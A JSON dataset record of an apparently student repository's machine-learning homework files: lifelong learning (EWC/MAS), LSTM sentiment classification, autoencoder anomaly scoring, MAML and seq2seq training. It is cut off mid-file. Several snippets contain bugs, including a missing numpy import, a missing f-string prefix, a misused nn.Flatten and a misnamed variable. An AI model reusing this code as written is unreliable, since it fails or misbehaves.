| 2022-11-18T20:48:13.785673 | 2020-07-08T05:35:39 | 2020-07-08T05:35:39 | 231,697,458 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 9,
"blob_id": "6e558691a56c95f0a2bf1f83454529b20572d7b8",
"content_id": "a529c108f141d319f879d477d80a27b743df8b6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 30,
"license_type": "no_license",
"max_line_length": 12,
"num_lines": 3,
"path": "/README.md",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# helloworld\njust me\nonly you\n"
},
{
"alpha_fraction": 0.5261984467506409,
"alphanum_fraction": 0.5362318754196167,
"avg_line_length": 35.90140914916992,
"blob_id": "d1c92a2e24833629052c9bdff8ead4b05e51546a",
"content_id": "fb0db8565cccde3ce7bdb9601a79672db66a5699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2827,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 71,
"path": "/hw14_life_long_learning/data.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import os\r\nfrom torch.utils import data\r\nfrom torch.utils.data import sampler\r\nfrom torchvision import datasets\r\nfrom hw14_life_long_learning.preprocess import get_transform\r\n\r\n\r\n# 準備 資料集\r\n# MNIST : 一張圖片資料大小: 28∗28∗1 , 灰階 , 10 個種類\r\n# SVHN : 一張圖片資料大小: 32∗32∗3 , RGB , 10 個種類\r\n# USPS : 一張圖片資料大小: 16∗16∗1 , 灰階 , 10 個種類\r\nclass Data():\r\n def __init__(self, path):\r\n transform = get_transform()\r\n\r\n self.MNIST_dataset = datasets.MNIST(root=os.path.join(path, \"MNIST\"),\r\n transform=transform,\r\n train=True,\r\n download=True)\r\n\r\n self.SVHN_dataset = datasets.SVHN(root=os.path.join(path, \"SVHN\"),\r\n transform=transform,\r\n split='train',\r\n download=True)\r\n\r\n self.USPS_dataset = datasets.USPS(root=os.path.join(path, \"USPS\"),\r\n transform=transform,\r\n train=True,\r\n download=True)\r\n\r\n def get_datasets(self):\r\n a = [(self.SVHN_dataset, \"SVHN\"), (self.MNIST_dataset, \"MNIST\"), (self.USPS_dataset, \"USPS\")]\r\n return a\r\n\r\n\r\n# 建立 Dataloader\r\n# *.train_loader: 拿取訓練集並訓練 \\\r\n# *.val_loader: 拿取驗證集並驗測結果 \\\r\nclass Dataloader():\r\n\r\n def __init__(self, dataset, batch_size, split_ratio=0.1):\r\n self.dataset = dataset[0]\r\n self.name = dataset[1]\r\n train_sampler, val_sampler = self.split_dataset(split_ratio)\r\n\r\n self.train_dataset_size = len(train_sampler)\r\n self.val_dataset_size = len(val_sampler)\r\n\r\n self.train_loader = data.DataLoader(self.dataset, batch_size=batch_size, sampler=train_sampler)\r\n self.val_loader = data.DataLoader(self.dataset, batch_size=batch_size, sampler=val_sampler)\r\n self.train_iter = self.infinite_iter()\r\n\r\n def split_dataset(self, split_ratio):\r\n data_size = len(self.dataset)\r\n split = int(data_size * split_ratio)\r\n indices = list(range(data_size))\r\n np.random.shuffle(indices)\r\n train_idx, valid_idx = indices[split:], indices[:split]\r\n\r\n train_sampler = sampler.SubsetRandomSampler(train_idx)\r\n val_sampler = sampler.SubsetRandomSampler(valid_idx)\r\n return train_sampler, val_sampler\r\n\r\n def infinite_iter(self):\r\n it = iter(self.train_loader)\r\n while True:\r\n try:\r\n ret = next(it)\r\n yield ret\r\n except StopIteration:\r\n it = iter(self.train_loader)\r\n"
},
{
"alpha_fraction": 0.4812791645526886,
"alphanum_fraction": 0.4908387362957001,
"avg_line_length": 37.554054260253906,
"blob_id": "e69e5f7dc4e7e351e6b27e2955434ecfdf1fdd29",
"content_id": "b58d0e58a507ab4aa4eded9870216c92033a1012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8903,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 222,
"path": "/hw14_life_long_learning/train.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import json\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom hw14_life_long_learning.EWC import EWC\r\nfrom hw14_life_long_learning.MAS import MAS\r\nfrom hw14_life_long_learning.config import configurations\r\nfrom hw14_life_long_learning.utils import save_model, build_model, load_model\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n\r\ndef normal_train(model, optimizer, task, total_epochs, summary_epochs):\r\n model.train()\r\n model.zero_grad()\r\n ceriation = nn.CrossEntropyLoss()\r\n losses = []\r\n loss = 0.0\r\n for epoch in range(summary_epochs):\r\n imgs, labels = next(task.train_iter)\r\n imgs, labels = imgs.to(device), labels.to(device)\r\n outputs = model(imgs)\r\n ce_loss = ceriation(outputs, labels)\r\n\r\n optimizer.zero_grad()\r\n ce_loss.backward()\r\n optimizer.step()\r\n\r\n loss += ce_loss.item()\r\n if (epoch + 1) % 50 == 0:\r\n loss = loss / 50\r\n print(\"\\r\", \"train task {} [{}] loss: {:.3f} \".format(task.name, (total_epochs + epoch + 1), loss),\r\n end=\" \")\r\n losses.append(loss)\r\n loss = 0.0\r\n\r\n return model, optimizer, losses\r\n\r\n\r\ndef ewc_train(model, optimizer, task, total_epochs, summary_epochs, ewc, lambda_ewc):\r\n model.train()\r\n model.zero_grad()\r\n ceriation = nn.CrossEntropyLoss()\r\n losses = []\r\n loss = 0.0\r\n for epoch in range(summary_epochs):\r\n imgs, labels = next(task.train_iter)\r\n imgs, labels = imgs.to(device), labels.to(device)\r\n outputs = model(imgs)\r\n ce_loss = ceriation(outputs, labels)\r\n total_loss = ce_loss\r\n ewc_loss = ewc.penalty(model)\r\n total_loss += lambda_ewc * ewc_loss\r\n\r\n optimizer.zero_grad()\r\n total_loss.backward()\r\n optimizer.step()\r\n\r\n loss += total_loss.item()\r\n if (epoch + 1) % 50 == 0:\r\n loss = loss / 50\r\n print(\"\\r\", \"train task {} [{}] loss: {:.3f} \".format(task.name, (total_epochs + epoch + 1), loss),\r\n end=\" \")\r\n losses.append(loss)\r\n loss = 0.0\r\n\r\n return model, optimizer, losses\r\n\r\n\r\ndef mas_train(model, optimizer, task, total_epochs, summary_epochs, mas_tasks, lambda_mas, alpha=0.8):\r\n model.train()\r\n model.zero_grad()\r\n ceriation = nn.CrossEntropyLoss()\r\n losses = []\r\n loss = 0.0\r\n for epoch in range(summary_epochs):\r\n imgs, labels = next(task.train_iter)\r\n imgs, labels = imgs.to(device), labels.to(device)\r\n outputs = model(imgs)\r\n ce_loss = ceriation(outputs, labels)\r\n total_loss = ce_loss\r\n mas_tasks.reverse()\r\n if len(mas_tasks) > 1:\r\n preprevious = 1 - alpha\r\n scalars = [alpha, preprevious]\r\n for mas, scalar in zip(mas_tasks[:2], scalars):\r\n mas_loss = mas.penalty(model)\r\n total_loss += lambda_mas * mas_loss * scalar\r\n elif len(mas_tasks) == 1:\r\n mas_loss = mas_tasks[0].penalty(model)\r\n total_loss += lambda_mas * mas_loss\r\n else:\r\n pass\r\n\r\n optimizer.zero_grad()\r\n total_loss.backward()\r\n optimizer.step()\r\n\r\n loss += total_loss.item()\r\n if (epoch + 1) % 50 == 0:\r\n loss = loss / 50\r\n print(\"\\r\", \"train task {} [{}] loss: {:.3f} \".format(task.name, (total_epochs + epoch + 1), loss),\r\n end=\" \")\r\n losses.append(loss)\r\n loss = 0.0\r\n\r\n return model, optimizer, losses\r\n\r\n\r\ndef val(model, task):\r\n model.eval()\r\n correct_cnt = 0\r\n for imgs, labels in task.val_loader:\r\n imgs, labels = imgs.to(device), labels.to(device)\r\n outputs = model(imgs)\r\n _, pred_label = torch.max(outputs.data, 1)\r\n\r\n correct_cnt += (pred_label == labels.data).sum().item()\r\n\r\n return correct_cnt / 
task.val_dataset_size\r\n\r\n\r\ndef train_process(model, optimizer, tasks, config):\r\n task_loss, acc = {}, {}\r\n for task_id, task in enumerate(tasks):\r\n print('\\n')\r\n total_epochs = 0\r\n task_loss[task.name] = []\r\n acc[task.name] = []\r\n if config.mode == 'basic' or task_id == 0:\r\n while (total_epochs < config.num_epochs):\r\n model, optimizer, losses = normal_train(model, optimizer, task, total_epochs, config.summary_epochs)\r\n task_loss[task.name] += losses\r\n\r\n for subtask in range(task_id + 1):\r\n acc[tasks[subtask].name].append(val(model, tasks[subtask]))\r\n\r\n total_epochs += config.summary_epochs\r\n if total_epochs % config.store_epochs == 0 or total_epochs >= config.num_epochs:\r\n save_model(model, optimizer, config.store_model_path)\r\n\r\n if config.mode == 'ewc' and task_id > 0:\r\n old_dataloaders = []\r\n for old_task in range(task_id):\r\n old_dataloaders += [tasks[old_task].val_loader]\r\n ewc = EWC(model, old_dataloaders, device)\r\n while (total_epochs < config.num_epochs):\r\n model, optimizer, losses = ewc_train(model, optimizer, task, total_epochs, config.summary_epochs, ewc,\r\n config.lifelong_coeff)\r\n task_loss[task.name] += losses\r\n\r\n for subtask in range(task_id + 1):\r\n acc[tasks[subtask].name].append(val(model, tasks[subtask]))\r\n\r\n total_epochs += config.summary_epochs\r\n if total_epochs % config.store_epochs == 0 or total_epochs >= config.num_epochs:\r\n save_model(model, optimizer, config.store_model_path)\r\n\r\n if config.mode == 'mas' and task_id > 0:\r\n old_dataloaders = []\r\n mas_tasks = []\r\n for old_task in range(task_id):\r\n old_dataloaders += [tasks[old_task].val_loader]\r\n mas = MAS(model, old_dataloaders, device)\r\n mas_tasks += [mas]\r\n while (total_epochs < config.num_epochs):\r\n model, optimizer, losses = mas_train(model, optimizer, task, total_epochs, config.summary_epochs,\r\n mas_tasks, config.lifelong_coeff)\r\n task_loss[task.name] += losses\r\n\r\n for subtask in range(task_id + 1):\r\n acc[tasks[subtask].name].append(val(model, tasks[subtask]))\r\n\r\n total_epochs += config.summary_epochs\r\n if total_epochs % config.store_epochs == 0 or total_epochs >= config.num_epochs:\r\n save_model(model, optimizer, config.store_model_path)\r\n\r\n if config.mode == 'scp' and task_id > 0:\r\n pass\r\n ########################################\r\n ## TODO 區塊 ( PART 2 ) ##\r\n ########################################\r\n ## PART 2 implementation 的部份 ##\r\n ## 你也可以寫別的 regularization 方法 ##\r\n ## 助教這裡有提供的是 scp 的 作法 ##\r\n ## Slicer Cramer Preservation ##\r\n ########################################\r\n ########################################\r\n ## TODO 區塊 ( PART 2 ) ##\r\n ########################################\r\n return task_loss, acc\r\n\r\n\r\n\"\"\"\r\nthe order is svhn -> mnist -> usps\r\n\"\"\"\r\nif __name__ == '__main__':\r\n mode_list = ['mas', 'ewc', 'basic']\r\n\r\n ## hint: 謹慎的去選擇 lambda 超參數 / ewc: 80~400, mas: 0.1 - 10\r\n ############################################################################\r\n ##### TODO 區塊 ( PART 1 ) #####\r\n ############################################################################\r\n coeff_list = [0, 0, 0] ## 你需要在這 微調 lambda 參數, mas, ewc, baseline=0##\r\n ############################################################################\r\n ##### TODO 區塊 ( PART 1 ) #####\r\n ############################################################################\r\n\r\n config = configurations()\r\n count = 0\r\n for mode in mode_list:\r\n config.mode = mode\r\n 
config.lifelong_coeff = coeff_list[count]\r\n print(\"{} training\".format(config.mode))\r\n model, optimizer, tasks = build_model(config.load_model_path, config.batch_size, config.learning_rate)\r\n print(\"Finish build model\")\r\n if config.load_model:\r\n model, optimizer = load_model(model, optimizer, config.load_model_path)\r\n task_loss, acc = train_process(model, optimizer, tasks, config)\r\n with open(f'./{config.mode}_acc.txt', 'w') as f:\r\n json.dump(acc, f)\r\n count += 1\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6200191378593445,
"alphanum_fraction": 0.6388269066810608,
"avg_line_length": 42.18309783935547,
"blob_id": "49e1926cd97f10ac93b5cc25cd90944e36c8c444",
"content_id": "39aa222a4f572422e50797551eea2b5bc4aa4349",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3587,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 71,
"path": "/hw4RNN/main.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import os\r\nimport torch\r\nfrom hw4RNN.data import TwitterDataset\r\nfrom hw4RNN.model import LSTM_Net\r\nfrom hw4RNN.preprocess import Preprocess\r\nfrom hw4RNN.train import training\r\nfrom hw4RNN.utils import load_training_data\r\n\r\n# 本次作業是NLP當中一個簡單的task——句子分類(文本分類)\r\n# 給定一個句子,判斷他有沒有惡意(負面標1,正面標0)\r\n# 数据集有三個檔案,分別是training_label.txt、training_nolabel.txt、testing_data.txt\r\n# training_label.txt:有label的training data(句子配上0 or 1)\r\n# training_nolabel.txt:沒有label的training data(只有句子),用來做semi-supervise learning\r\n# testing_data.txt:你要判斷testing data裡面的句子是0 or 1\r\n\r\n\r\nif __name__ == '__main__':\r\n path_prefix = './'\r\n # 通過torch.cuda.is_available()的回傳值進行判斷是否有使用GPU的環境,如果有的話device就設為\"cuda\",沒有的話就設為\"cpu\"\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n # 處理好各個data的路徑\r\n train_with_label = os.path.join(path_prefix, 'training_label.txt')\r\n train_no_label = os.path.join(path_prefix, 'training_nolabel.txt')\r\n testing_data = os.path.join(path_prefix, 'testing_data.txt')\r\n\r\n w2v_path = os.path.join(path_prefix, 'w2v_all.model') # 處理word to vec model的路徑\r\n\r\n # 定義句子長度、要不要固定embedding、batch大小、要訓練幾個epoch、learning rate的值、model的資料夾路徑\r\n sen_len = 30\r\n fix_embedding = True # fix embedding during training\r\n batch_size = 2\r\n epoch = 5\r\n lr = 0.001\r\n # model_dir = os.path.join(path_prefix, 'model/') # model directory for checkpoint model\r\n model_dir = path_prefix # model directory for checkpoint model\r\n\r\n print(\"loading data ...\") # 把'training_label.txt'跟'training_nolabel.txt'讀進來\r\n train_x, y = load_training_data(train_with_label)\r\n train_x_no_label = load_training_data(train_no_label)\r\n\r\n # 對input跟labels做預處理\r\n preprocess = Preprocess(train_x, sen_len, w2v_path=w2v_path)\r\n embedding = preprocess.make_embedding(load=True)\r\n train_x = preprocess.sentence_word2idx()\r\n y = preprocess.labels_to_tensor(y)\r\n\r\n # 製作一個model的對象\r\n model = LSTM_Net(embedding, embedding_dim=250, hidden_dim=250, num_layers=1, dropout=0.5, fix_embedding=fix_embedding)\r\n model = model.to(device) # device為\"cuda\",model使用GPU來訓練(餵進去的inputs也需要是cuda tensor)\r\n\r\n # 把data分為training data跟validation data(將一部份training data拿去當作validation data)\r\n X_train, X_val, y_train, y_val = train_x[:190000], train_x[190000:], y[:190000], y[190000:]\r\n\r\n # 把data做成dataset供dataloader取用\r\n train_dataset = TwitterDataset(X=X_train, y=y_train)\r\n val_dataset = TwitterDataset(X=X_val, y=y_val)\r\n\r\n # 把data 轉成 batch of tensors\r\n train_loader = torch.utils.data.DataLoader(dataset = train_dataset,\r\n batch_size = batch_size,\r\n shuffle = True,\r\n num_workers = 0)\r\n\r\n val_loader = torch.utils.data.DataLoader(dataset = val_dataset,\r\n batch_size = batch_size,\r\n shuffle = False,\r\n num_workers = 0)\r\n\r\n # 開始訓練\r\n training(batch_size, epoch, lr, model_dir, train_loader, val_loader, model, device)\r\n"
},
{
"alpha_fraction": 0.6041666865348816,
"alphanum_fraction": 0.6116898059844971,
"avg_line_length": 34.76595687866211,
"blob_id": "a7af9b80a07026200ec24b3fbeef4c6bf215fe1b",
"content_id": "f18994de37cd30121b53ad1625591e4445305278",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1838,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 47,
"path": "/hw10_anomaly_detection/evaluation.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nfrom torch.utils.data.dataloader import DataLoader\r\nfrom torch.utils.data.dataset import TensorDataset\r\nfrom torch.utils.data.sampler import SequentialSampler\r\nimport numpy as np\r\n\r\n\r\n# 將testing的圖片輸入model後,可以得到其重建的圖片,並對兩者取平方差。\r\n# 可以發現inlier的平方差應該與outlier的平方差形成差距明顯的兩群數據。\r\n\r\nif task == 'ae':\r\n if model_type == 'fcn' or model_type == 'vae':\r\n y = test.reshape(len(test_tmp), -1)\r\n else:\r\n y = test\r\n\r\n data = torch.tensor(y, dtype=torch.float)\r\n test_dataset = TensorDataset(data)\r\n test_sampler = SequentialSampler(test_dataset)\r\n test_dataloader = DataLoader(test_dataset, sampler=test_sampler, batch_size=batch_size)\r\n\r\n model = torch.load('best_model_{}.pt'.format(model_type), map_location='cuda')\r\n\r\n model.eval()\r\n reconstructed = list()\r\n for i, data in enumerate(test_dataloader):\r\n if model_type == 'cnn':\r\n img = data[0].transpose(3, 1).cuda()\r\n else:\r\n img = data[0].cuda()\r\n output = model(img)\r\n if model_type == 'cnn':\r\n output = output.transpose(3, 1)\r\n elif model_type == 'vae':\r\n output = output[0]\r\n reconstructed.append(output.cpu().detach().numpy())\r\n\r\n reconstructed = np.concatenate(reconstructed, axis=0)\r\n anomality = np.sqrt(np.sum(np.square(reconstructed - y).reshape(len(y), -1), axis=1))\r\n y_pred = anomality\r\n with open('prediction.csv', 'w') as f:\r\n f.write('id,anomaly\\n')\r\n for i in range(len(y_pred)):\r\n f.write('{},{}\\n'.format(i + 1, y_pred[i]))\r\n # score = roc_auc_score(y_label, y_pred, average='micro')\r\n # score = f1_score(y_label, y_pred, average='micro')\r\n # print('auc score: {}'.format(score))\r\n"
},
{
"alpha_fraction": 0.567685604095459,
"alphanum_fraction": 0.580058217048645,
"avg_line_length": 30.714284896850586,
"blob_id": "19f09081d349339974ef9df3ecbe2ade1b03257e",
"content_id": "6b17ca79d87312fd0cd726b317640149279a7c01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1504,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 42,
"path": "/hw4RNN/utils.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# utils.py\r\n# 這個block用來先定義一些等等常用到的函式\r\nimport torch\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\n\r\n\r\ndef load_training_data(path='./training_label.txt'):\r\n # 把training時需要的data讀進來\r\n # 如果是'training_label.txt',需要讀取label,如果是'training_nolabel.txt',不需要讀取label\r\n if 'training_label' in path:\r\n with open(path, 'r', encoding='UTF-8') as f:\r\n lines = f.readlines()\r\n lines = [line.strip('\\n').split(' ') for line in lines]\r\n x = [line[2:] for line in lines]\r\n y = [line[0] for line in lines]\r\n return x, y\r\n else:\r\n with open(path, 'r', encoding='UTF-8') as f:\r\n lines = f.readlines()\r\n x = [line.strip('\\n').split(' ') for line in lines]\r\n return x\r\n\r\n\r\ndef load_testing_data(path='./testing_data.txt'):\r\n # 把testing時需要的data讀進來\r\n with open(path, 'r', encoding='UTF-8') as f:\r\n lines = f.readlines()\r\n X = [\"\".join(line.strip('\\n').split(\",\")[1:]).strip() for line in lines[1:]]\r\n X = [sen.split(' ') for sen in X]\r\n return X\r\n\r\n\r\ndef evaluation(outputs, labels):\r\n #outputs => probability (float)\r\n #labels => labels\r\n outputs[outputs >= 0.5] = 1 # 大於等於0.5為有惡意\r\n outputs[outputs < 0.5] = 0 # 小於0.5為無惡意\r\n correct = torch.sum(torch.eq(outputs, labels)).item()\r\n return correct\r\n"
},
{
"alpha_fraction": 0.5660864114761353,
"alphanum_fraction": 0.5804857015609741,
"avg_line_length": 39.1769905090332,
"blob_id": "7abc8fc091c3266844c0b9d27e694c292b28566e",
"content_id": "1aadb2ab8021d9b61cfe07ba98c8bcf34d799bd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5174,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 113,
"path": "/hw13_meta_learning/model.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import DataLoader, Dataset\r\nimport torchvision.transforms as transforms\r\nimport glob\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nfrom collections import OrderedDict\r\n\r\n\r\ndef ConvBlock(in_ch, out_ch):\r\n return nn.Sequential(nn.Conv2d(in_ch, out_ch, 3, padding=1),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2)) # 原作者在 paper 裡是說她在 omniglot 用的是 strided convolution\r\n # 不過這裡我改成 max pool (mini imagenet 才是 max pool)\r\n # 這並不是你們在 report 第三題要找的 tip\r\n\r\n\r\ndef ConvBlockFunction(x, w, b, w_bn, b_bn):\r\n x = F.conv2d(x, w, b, padding=1)\r\n x = F.batch_norm(x, running_mean=None, running_var=None, weight=w_bn, bias=b_bn, training=True)\r\n x = F.relu(x)\r\n x = F.max_pool2d(x, kernel_size=2, stride=2)\r\n return x\r\n\r\n\r\nclass Classifier(nn.Module):\r\n def __init__(self, in_ch, k_way):\r\n super(Classifier, self).__init__()\r\n self.conv1 = ConvBlock(in_ch, 64)\r\n self.conv2 = ConvBlock(64, 64)\r\n self.conv3 = ConvBlock(64, 64)\r\n self.conv4 = ConvBlock(64, 64)\r\n self.logits = nn.Linear(64, k_way)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = self.conv2(x)\r\n x = self.conv3(x)\r\n x = self.conv4(x)\r\n x = nn.Flatten(x)\r\n x = self.logits(x)\r\n return x\r\n\r\n def functional_forward(self, x, params):\r\n '''\r\n Arguments:\r\n x: input images [batch, 1, 28, 28]\r\n params: 模型的參數,也就是 convolution 的 weight 跟 bias,以及 batchnormalization 的 weight 跟 bias\r\n 這是一個 OrderedDict\r\n '''\r\n for block in [1, 2, 3, 4]:\r\n x = ConvBlockFunction(x, params['conv{block}.0.weight'], params[f'conv{block}.0.bias'],\r\n params.get('conv{block}.1.weight'), params.get(f'conv{block}.1.bias'))\r\n x = x.view(x.shape[0], -1)\r\n x = F.linear(x, params['logits.weight'], params['logits.bias'])\r\n return x\r\n\r\n\r\ndef create_label(n_way, k_shot):\r\n return torch.arange(n_way).repeat_interleave(k_shot).long()\r\n\r\n\r\n# 我們試著產生 5 way 2 shot 的 label 看看\r\n# create_label(5, 2)\r\n\r\ndef MAML(model, optimizer, x, n_way, k_shot, q_query, loss_fn, inner_train_step=1, inner_lr=0.4, train=True):\r\n \"\"\"\r\n Args:\r\n x is the input omniglot images for a meta_step, shape = [batch_size, n_way * (k_shot + q_query), 1, 28, 28]\r\n n_way: 每個分類的 task 要有幾個 class\r\n k_shot: 每個類別在 training 的時候會有多少張照片\r\n q_query: 在 testing 時,每個類別會用多少張照片 update\r\n \"\"\"\r\n criterion = loss_fn\r\n task_loss = [] # 這裡面之後會放入每個 task 的 loss\r\n task_acc = [] # 這裡面之後會放入每個 task 的 loss\r\n for meta_batch in x:\r\n train_set = meta_batch[:n_way * k_shot] # train_set 是我們拿來 update inner loop 參數的 data\r\n val_set = meta_batch[n_way * k_shot:] # val_set 是我們拿來 update outer loop 參數的 data\r\n\r\n fast_weights = OrderedDict(\r\n model.named_parameters()) # 在 inner loop update 參數時,我們不能動到實際參數,因此用 fast_weights 來儲存新的參數 θ'\r\n\r\n for inner_step in range(inner_train_steps): # 這個 for loop 是 Algorithm2 的 line 7~8\r\n # 實際上我們 inner loop 只有 update 一次 gradients,不過某些 task 可能會需要多次 update inner loop 的 θ',\r\n # 所以我們還是用 for loop 來寫\r\n train_label = create_label(n_way, k_shot).cuda()\r\n logits = model.functional_forward(train_set, fast_weights)\r\n loss = criterion(logits, train_label)\r\n grads = torch.autograd.grad(loss, fast_weights.values(),\r\n create_graph=True) # 這裡是要計算出 loss 對 θ 的微分 (∇loss)\r\n fast_weights = OrderedDict((name, param - inner_lr * grad)\r\n for ((name, param), grad) in\r\n zip(fast_weights.items(), grads)) # 這裡是用剛剛算出的 ∇loss 來 update θ 變成 θ'\r\n\r\n val_label = 
create_label(n_way, q_query).cuda()\r\n logits = model.functional_forward(val_set, fast_weights) # compute the logits on val_set with θ'\r\n loss = criterion(logits, val_label) # compute the loss on val_set with θ'\r\n task_loss.append(loss) # put this task's loss into task_loss\r\n acc = np.asarray([torch.argmax(logits, -1).cpu().numpy() == val_label.cpu().numpy()]).mean() # compute the accuracy\r\n task_acc.append(acc)\r\n\r\n model.train()\r\n optimizer.zero_grad()\r\n meta_batch_loss = torch.stack(task_loss).mean() # we update θ (not θ') with the loss of the whole batch\r\n if train:\r\n meta_batch_loss.backward()\r\n optimizer.step()\r\n task_acc = np.mean(task_acc)\r\n return meta_batch_loss, task_acc\r\n"
},
{
"alpha_fraction": 0.5960058569908142,
"alphanum_fraction": 0.6068156957626343,
"avg_line_length": 34.61745071411133,
"blob_id": "610974a9a124caa9a3fe4f986a688f51eafc3352",
"content_id": "e3ed69988a78192bcf0f66e34411403f972fc2b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5610,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 149,
"path": "/hw8_seq2seq/main.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nimport torch.utils.data as data\r\nimport torch.utils.data.sampler as sampler\r\nimport torchvision\r\nfrom torchvision import datasets, transforms\r\nimport numpy as np\r\nimport sys\r\nimport os\r\nimport random\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nfrom hw8_seq2seq.config import configurations\r\nfrom hw8_seq2seq.data import EN2CNDataset\r\nfrom hw8_seq2seq.utils import build_model\r\nfrom hw8_seq2seq.utils import save_model\r\nfrom hw8_seq2seq.utils import schedule_sampling\r\nfrom hw8_seq2seq.utils import tokens2sentence, computebleu, infinite_iter\r\n\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") # 判斷是用 CPU 還是 GPU 執行運算\r\n\r\n\r\ndef train(model, optimizer, train_iter, loss_function, total_steps, summary_steps, train_dataset):\r\n model.train()\r\n model.zero_grad()\r\n losses = []\r\n loss_sum = 0.0\r\n for step in range(summary_steps):\r\n sources, targets = next(train_iter)\r\n sources, targets = sources.to(device), targets.to(device)\r\n outputs, preds = model(sources, targets, schedule_sampling())\r\n # targets 的第一個 token 是 <BOS> 所以忽略\r\n outputs = outputs[:, 1:].reshape(-1, outputs.size(2))\r\n targets = targets[:, 1:].reshape(-1)\r\n loss = loss_function(outputs, targets)\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), 1)\r\n optimizer.step()\r\n\r\n loss_sum += loss.item()\r\n if (step + 1) % 5 == 0:\r\n loss_sum = loss_sum / 5\r\n print(\"\\r\", \"train [{}] loss: {:.3f}, Perplexity: {:.3f} \".format(total_steps + step + 1, loss_sum, np.exp(loss_sum)), end=\" \")\r\n losses.append(loss_sum)\r\n loss_sum = 0.0\r\n\r\n return model, optimizer, losses\r\n\r\n\r\ndef test(model, dataloader, loss_function):\r\n model.eval()\r\n loss_sum, bleu_score = 0.0, 0.0\r\n n = 0\r\n result = []\r\n for sources, targets in dataloader:\r\n sources, targets = sources.to(device), targets.to(device)\r\n batch_size = sources.size(0)\r\n outputs, preds = model.inference(sources, targets)\r\n # targets 的第一個 token 是 <BOS> 所以忽略\r\n outputs = outputs[:, 1:].reshape(-1, outputs.size(2))\r\n targets = targets[:, 1:].reshape(-1)\r\n\r\n loss = loss_function(outputs, targets)\r\n loss_sum += loss.item()\r\n\r\n # 將預測結果轉為文字\r\n targets = targets.view(sources.size(0), -1)\r\n preds = tokens2sentence(preds, dataloader.dataset.int2word_cn)\r\n sources = tokens2sentence(sources, dataloader.dataset.int2word_en)\r\n targets = tokens2sentence(targets, dataloader.dataset.int2word_cn)\r\n for source, pred, target in zip(sources, preds, targets):\r\n result.append((source, pred, target))\r\n # 計算 Bleu Score\r\n bleu_score += computebleu(preds, targets)\r\n\r\n n += batch_size\r\n\r\n return loss_sum / len(dataloader), bleu_score / n, result\r\n\r\n\r\ndef train_process(config):\r\n # 準備訓練資料\r\n train_dataset = EN2CNDataset(config.data_path, config.max_output_len, 'training')\r\n train_loader = data.DataLoader(train_dataset, batch_size=config.batch_size, shuffle=True)\r\n train_iter = infinite_iter(train_loader)\r\n # 準備檢驗資料\r\n val_dataset = EN2CNDataset(config.data_path, config.max_output_len, 'validation')\r\n val_loader = data.DataLoader(val_dataset, batch_size=1)\r\n # 建構模型\r\n model, optimizer = build_model(config, train_dataset.en_vocab_size, train_dataset.cn_vocab_size)\r\n loss_function = nn.CrossEntropyLoss(ignore_index=0)\r\n\r\n train_losses, val_losses, bleu_scores = [], 
[], []\r\n total_steps = 0\r\n while (total_steps < config.num_steps):\r\n # train the model\r\n model, optimizer, loss = train(model, optimizer, train_iter, loss_function, total_steps, config.summary_steps,\r\n train_dataset)\r\n train_losses += loss\r\n # validate the model\r\n val_loss, bleu_score, result = test(model, val_loader, loss_function)\r\n val_losses.append(val_loss)\r\n bleu_scores.append(bleu_score)\r\n\r\n total_steps += config.summary_steps\r\n print(\"\\r\", \"val [{}] loss: {:.3f}, Perplexity: {:.3f}, bleu score: {:.3f} \".format(total_steps, val_loss,\r\n np.exp(val_loss),\r\n bleu_score))\r\n\r\n # save the model and the results\r\n if total_steps % config.store_steps == 0 or total_steps >= config.num_steps:\r\n save_model(model, optimizer, config.store_model_path, total_steps)\r\n with open(f'{config.store_model_path}/output_{total_steps}.txt', 'w') as f:\r\n for line in result:\r\n print(line, 